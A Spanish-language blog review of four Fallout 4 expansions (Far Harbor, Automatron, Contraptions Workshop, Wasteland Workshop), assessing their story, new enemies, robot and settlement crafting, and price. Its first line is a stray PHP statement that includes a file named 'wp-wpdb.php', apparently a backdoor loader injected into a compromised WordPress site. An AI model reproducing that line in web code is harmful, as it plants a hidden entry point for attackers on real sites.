if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Fallout 4: Far Harbor, Automatron, Wasteland Workshop y Contraptions Workshop – La Fortaleza de LeChuck

Fallout 4: Far Harbor, Automatron, Wasteland Workshop y Contraptions Workshop

Fallout 4 nos ha dejado con muy buen sabor de boca tras sus cientos de horas de contenido, pero por si eso os sabe a poco Bethesda ha lanzado recientemente un pase de temporada en el que han prometido decenas horas de contenido y nuevas mejoras para el juego, así que hemos reunido todo el contenido descargable hasta la fecha: Far Harbor, AUTOMATRON, Wasteland Workshop y Contraptions Workshop. Mediante esta entrada, iremos actualizando para analizar todos los extras que trae el Season Pass.

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FAR HARBOR

Far Harbor es el DLC más grande que ha hecho Bethesda hasta la fecha superando incluso a la expansión de Shivering Isles de Oblivion, su historia se desarrolla en una nueva isla al norte y cuenta con una extensión de terreno de casi la una quinta parte del mapa de Fallout 4, hay que puntualizar que a pesar de que el mapa es bastante grande no está todo lo bien aprovechado que debería ya que hay mucho espacio entre una localización y otra, además no estará tan densamente habitado como la Commonwealth y ese es posiblemente su mayor pero aunque habrá una gran cantidad de localizaciones y secretos por descubrir durante las 12-13 horas de juego que nos brinda el DLC, unas cuantas más si nos paramos a investigar todo.

Para poder iniciar esta expansión será necesario que tengamos al menos el nivel 25 para poder salir mínimamente airosos, pero es recomendable tener al menos el 30 o superior, una vez cumplamos ese requisito se iniciará una misión a cargo de la agencia de detectives de Valentine, una familia ha contratado nuestros servicios para que investiguemos la desaparición un tanto extraña de su hija que al parecer se ha “fugado” a una isla llamada Far Harbor que se encuentra fuera del mapa, nuestra labor será la de ir a buscarla y traerla de vuelta sana y salva, pero pronto nos daremos cuenta de que no va a ser entrar y salir.

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Dentro de la isla hay 3 facciones principales, por un lado están los lugareños del asentamiento principal, por otro el grupo de Synths que al parecer han “embaucado” a la muchacha que debemos buscar y por ultimo están los Hijos del átomo y algún que otro saqueador, por desgracia estas facciones no viven en ningún tipo de armonía y hay varios conflictos importantes que nos van a dificultar en gran medida nuestra misión, por lo que tendremos que ingeniárnoslas para buscar una de las muchas vías de resolución posibles para poder completar esta expansión.

Una de las cosas que más se criticó en Fallout 4 es la forma en la que se desarrolla la historia, ya que podías hacer misiones de cualquier facción sin consecuencias con las otras hasta llegado cierto punto donde tenías que elegir a cual apoyar finalmente, y Bethesda, haciendo caso de las propuestas de los fans, ha cambiado esa propuesta por una más compleja que hace la historia mucho más creíble, la vía de desarrollo con las facciones habrá que decidirla casi desde el principio, ya que si hacemos misiones de una las otras nos pondrán trabas o no nos confiarán cierta información a la hora de poder avanzar en su quest, algo muy interesante ya que invita mucho a la rejugabilidad y hace que las decisiones que tomemos tengan mucho más peso e importancia. Por otra parte esta historia se aleja del concepto de mata mata que tenía la campaña principal, dentro de las 25 misiones principales y otras tantas secundarias tenemos unas cuantas que nos invitan a pensar un poco mediante rompecabezas o en las que habrá que investigar y sacar información de forma sutil para evitar males mayores.

En la isla habrá una constante, y a veces muy molesta, niebla que nos acompañará durante casi toda nuestra aventura y la verdad es que no facilita nada las cosas, al ser radiactiva nos iremos envenenando poco a poco hasta el punto de que en el exterior el daño a pesar de ser muy poco es casi constante, por lo que se recomienda llevar una gran cantidad de Rad X y Rad Away, y no estaría de más llevarnos un traje de protección por si las moscas. A pesar de que esta niebla pueda romper un poco la tranquilidad a la hora de desplazarnos le da un encanto especial ya que se crea una atmosfera de misterio que encaja a la perfección con la gran banda sonora creada para este DLC que se suma a varias pistas de la banda sonora original haciendo que el pasear por estos nuevos paisajes sea toda una experiencia.

Far Harbor viene con una gran cantidad de añadidos entre los que tenemos nuevos enemigos como los tragadores, unas salamandras gigantes que escupen ácido y no se andan con tonterías a la hora de prepararte una emboscada, lo mejor de estos enemigos es que en su interior al matarlos puede haber casi cualquier tipo de equipo, también tenemos a los pejesapos, algo parecido a un renacuajo sin desarrollar que habita en las zonas de agua y espera sigilosamente hasta que nos acercamos demasiado, hay que tener mucho cuidado con ellos ya que muchas veces aparecen de la nada y pueden absorber niebla para lanzarla en forma de llamarada, para acabar tenemos a los reptadores de la niebla, que básicamente son una mantis religiosa gigante con mucha mala leche, ojo a los golpes que pueden dar ya que no son ninguna tontería.

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Además de nuevos enemigos también se incluyen una grandísima cantidad de nuevas armas entre las que destaca el gran lanzaarpones, perfecto para cualquier enemigo difícil, también hay multiples esquemas y nuevos añadidos a la hora de crear modificaciones para armas, armaduras y decoración para nuestros asentamientos, y por último, pero no por ello menos importante la posibilidad de tener un nuevo compañero de viajes que ya hizo su aparición en el minijuego Fallout Shelter para móviles.

En resumen, Far Harbor es lo más interesante que ha sacado Bethesda para Fallout 4, añade una gran cantidad de mejoras y equipo que sumados a la nueva zona hace que el juego tenga muchas más posibilidades, lo que es una pena es que esta isla no esté conectada con la Commonwealth ya muchas veces es un fastidio el tener que buscar materiales o volver para recoger equipo y armas especiales que nos hayamos dejado en nuestro baúl principal, por otro lado la narrativa ha sufrido un gran cambio a mejor y eso se agradece mucho ya que le da más profundidad al juego y el ritmo de misiones ya no se basa en matar constantemente.

AUTOMATRON

Automatron es el primer DLC para Fallout 4, no abunda el contenido y se centra casi por completo en la creación y diseño de robots, además tiene una pequeña historia de no más de 3-4 horas donde alguien llamado Mecanista está haciendo estragos por toda la Commonwealth gracias a unos robots modificados bastante peligrosos.

Nuestra misión dentro de esta historia, sin entrar en ningún tipo de spoiler, será la de investigar que está ocurriendo con todos estos robots y encontrar al Mecanista para conocer su motivación, durante esta breve misión tendremos como aliada a una nueva compañera de viajes llamada ADA la cual es un robot que quiere ayudarnos a devolver la tranquilidad al yermo.

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Dentro de las nuevas características que vienen con este DLC está la posibilidad de crear y modificar a nuestro antojo a cualquier robot que nos acompañe mediante una fábrica de mejoras, debido a la complejidad de los sistemas robóticos tendremos que hacernos primeramente con una pieza de robot para poder crearla después, es decir, que para ponerle piernas de cerebrobot a uno de nuestros compañeros primeramente habrá que encontrar un robot que nos suelte esa pieza en concreto. Dentro de las mejoras disponibles tenemos la posibilidad de elegir la combinación que más nos guste, aquí podemos ser todo lo creativos que queramos ya que hay una grandísima variedad de armas disponibles que hacen que el robot se pueda adaptar a cualquier tipo de lucha.

Al principio esta posibilidad estará bloqueada ya que hasta que no llegamos a la mitad de la historia no es posible acceder a este banco de mejoras, pero una vez lo tengamos podremos añadirle mejoras a los componentes que ya tengamos, estos componentes mejorarán de forma independiente a la estructura del robot la capacidad de movimiento, la de carga o la resistencia de este a los tiros y explosiones, es recomendable tener bastantes puntos de nivel metidos en ciencia y robótica para poder construir sin limitaciones ya que hay combinaciones que convierten a cualquier robot en nuestro mejor aliado.

Además del sistema de modificaciones de robots se añaden una gran cantidad de nuevas armas y mejoras basadas en armas y prototipos de robots, una de estas armas es una cabeza de un automatrón cortada que lanza un poderoso laser, hay es nada, y estas mejoras serán compatibles con las armas ya existentes dando aún más posibilidades a la hora de personalizar nuestras armas.

En resumen, Automatrón es un DLC simple que añade ciertas mejoras al juego bastante interesantes, la historia no es para tirar cohetes pero cumple su función y entretiene, por otra parte debido a la cantidad de mejoras que trae es un contenido perfecto si queremos empezar una nueva partida ya que si nos hemos acabado el juego y no hay mucho más que hacer no aporta demasiado contenido.

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CONTRAPTIONS WORKSHOP

Contraptions Workshop es otro DLC donde se añaden mejoras y nuevos objetos crafteables para los asentamientos, solo que en esta ocasión están más enfocados al nivel industrial mediante máquinas automáticas, forjas de armas y armaduras y sistemas de movimiento, detección y almacenaje.

Antes de meternos en todo el tema industrial hay que comentar que se han añadido varias estructuras predefinidas entre las que se encuentra un granero y un almacén que se puede llegar a transformar en una fábrica, además hay nuevos elementos de construcción pensados para crear espacios muy grandes, son perfectos para guardar toda la nueva maquinaria o por si nos queremos hacer una casa con techos muy altos, además se han añadido andamios y bases nuevas para poder hacer pisos a diferentes niveles.

La maquinaría es la que más peso tiene dentro de este nuevo DLC, por un lado tenemos las maquinas industriales que crean objetos y por otro varios elementos diferentes como un ascensor de hasta 4 plantas, un cañón de objetos, sistemas de detección por láser y de movimiento.

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Las maquinas que crean objetos son bastante útiles, se diferencian en función del objeto a crear, podemos crear armas de todo tipo, basta con elegir el tipo de arma u objeto misceláneo que queramos, armas de medio alcance por ejemplo, y montar todo el mecanismo con cintas transportadoras y sistemas de almacenaje, una vez tengamos toda la estructura terminada hay que añadir un terminal de control a la red eléctrica y mediante este terminal podremos programar la máquina para que fabrique lo que queramos, cada objeto necesitará ciertos materiales de construcción que se podrán meter en la máquina, una vez tengamos todo el material necesario y el terminal preparado bastará con darle la orden y la máquina se encargará de fabricar todos los objetos que pueda con el material disponible.

Por un lado puede parecer algo lioso pero por el otro podremos crear y mejorar cualquier tipo de arma sin necesidad de ir a buscar una por ahí o de comprarlas a un precio desorbitado en tiendas y sinceramente esa es la función más interesante de este DLC.

La decoración toma un papel bastante importante en este nuevo DLC, Por un lado se han añadido unos maniquíes donde podemos exponer nuestros conjuntos de armaduras preferidos, puedes elegir entre hombre y mujer para la estética de la armadura, el funcionamiento es bien sencillo, el maniquí dispone de un inventario muy parecido al de cualquier compañero, basta con darle las piezas de armadura que queramos y darle a la Y o triangulo para que este se equipe con la armadura, es muy útil para tener la ropa guardada en un sitio que no sea un simple cajón ya que el espacio de su inventario es muy grande y permite tener almacenadas varias piezas de armadura. Y si os lo estáis preguntando, si, las servoarmaduras también tienen un sitio donde poder exponerlas con luz y otros elementos personalizables mucho mejores que la estación de modificación, en este nuevo expositor podremos colocar cualquier servoarmadura que queramos.

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Los expositores de las armas funcionan de forma parecida, tendremos varios tamaños y formatos donde solo entra un tipo específico de arma y sea lo grande que sea ese expositor solo habrá espacio para un arma, lo bueno del caso es que debido a que no son formatos muy grandes no ocupan demasiado espacio en la pared y se pueden poner cuantos queramos, es bastante útil para organizar armas. También se han añadido varias vitrinas y expositores por si queremos guardar cualquier otro tipo de objeto, aunque hay que decir que habrá que poner el objeto a mano ya que no cuentan con un sistema de inventario, por lo que toca poner las cosas a pulso y no es tan divertido como pueda parecer.

Y ya acabar hay unas cuantas cosas nuevas como varios tipos de trampas mortales y no mortales, ya sabréis a lo que me refiero cuando las construyáis, un sistema para crear reacciones en cadena con un circuito de bolas e interruptores avanzados y varios objetos decorativos, en definitiva, es un DLC que no aporta demasiado al juego como pasa con los otros DLC de objetos pero en esta ocasión la gran mayoría de ellos tienen utilidades bastante interesantes, aunque si no tenéis el pase de temporada es mejor esperar a que baje de precio.

Wasteland Workshop

Debido a la importancia que tienen los asentamientos en Fallout 4, Wasteland Workshop se centra en traer nuevas mejoras y construcciones para poder personalizar más aún nuestro hogar, en general este DLC no trae mucho contenido nuevo, sí que es interesante lo que añade pero no lo es tanto teniendo en cuenta su precio y que tranquilamente podía haber venido con el juego desde el principio.

Por un lado tenemos alguno añadidos a los tipos de estructuras que nos dan un abanico de posibilidades mayor a la hora de elegir qué tipo de construcción vamos a usar, también se han añadido nuevos diseños de estructuras como nuevas paredes, techos y puertas entre otras cosas que ya existían para que haya más personalización. También tenemos una gran cantidad de nuevas formas de iluminación, se han añadido nuevas lámparas y también existe la posibilidad de añadir señales luminosas personalizables a cualquier estructura, algo puramente estético pero con muchas posibilidades.

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Lo más interesante de este nuevo DLC son las trampas de enemigos y las arenas de combate, la mecánica de funcionamiento de las trampas es sencilla, las creamos y mediante un cebo dentro de la jaula atraemos a diferentes tipos de enemigo que van desde un mero saqueador hasta un sanguinario alfa, hay muchos tipos de trampas y cada una sirve para atrapar a una especie en concreto, basta con añadirle corriente a la trampa para mantener encerrado al incauto que haya entrado.

Estas trampas se pueden colocar en cualquier sitio y no requieren de una vía de acceso para poder atrapar algo, cuando la tengamos activada solo habrá que esperar entre 24 y 48 horas de juego para encontrarnos a algo atrapado en su interior, una vez tengamos a algo o alguien atrapado podremos quitar la corriente para abrir la jaula, lo que salga de su interior será hostil, por lo que es recomendable crear un recinto previo para que el animal no mate a todo lo que le rodea. Mediante estas trampas es posible hacer peleas de monstruos gracias a las arenas de combate, bastará con poner dos trampas, poner el suelo de la arena que se puede construir con este DLC y rodearla con vayas si queremos ver el “espectáculo”.

Otro de los usos que podemos dar a estas trampas es mediante los inhibidores de enemigos, estos artilugios nos permiten amaestrar a cualquier bestia que hayamos capturado y esta se encargará de guardar el asentamiento como si de otro colono se tratase dando un índice de protección, hay que ser cuidadosos con la localización de los inhibidores ya que si el bicho se aleja demasiado se volverá hostil, por lo que poniendo un recinto alrededor del asentamiento e instalando un par de inhibidores tendremos a la bestia calmada y lista para defendernos.

En resumen, este DLC no aporta demasiado al juego, es interesante la mecánica de las jaulas y se agradece que haya nuevos materiales y estructuras, pero no aporta nada más que eso, está bien si te has pillado el pase de temporada, pero si no en mi opinión no vale lo que cuesta.

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Con todo este contenido descargable hasta la fecha, se suman muchas horas de diversión a Fallout 4, un juego ya de por si es largo y estupendo, una delicia que no os podéis perder.

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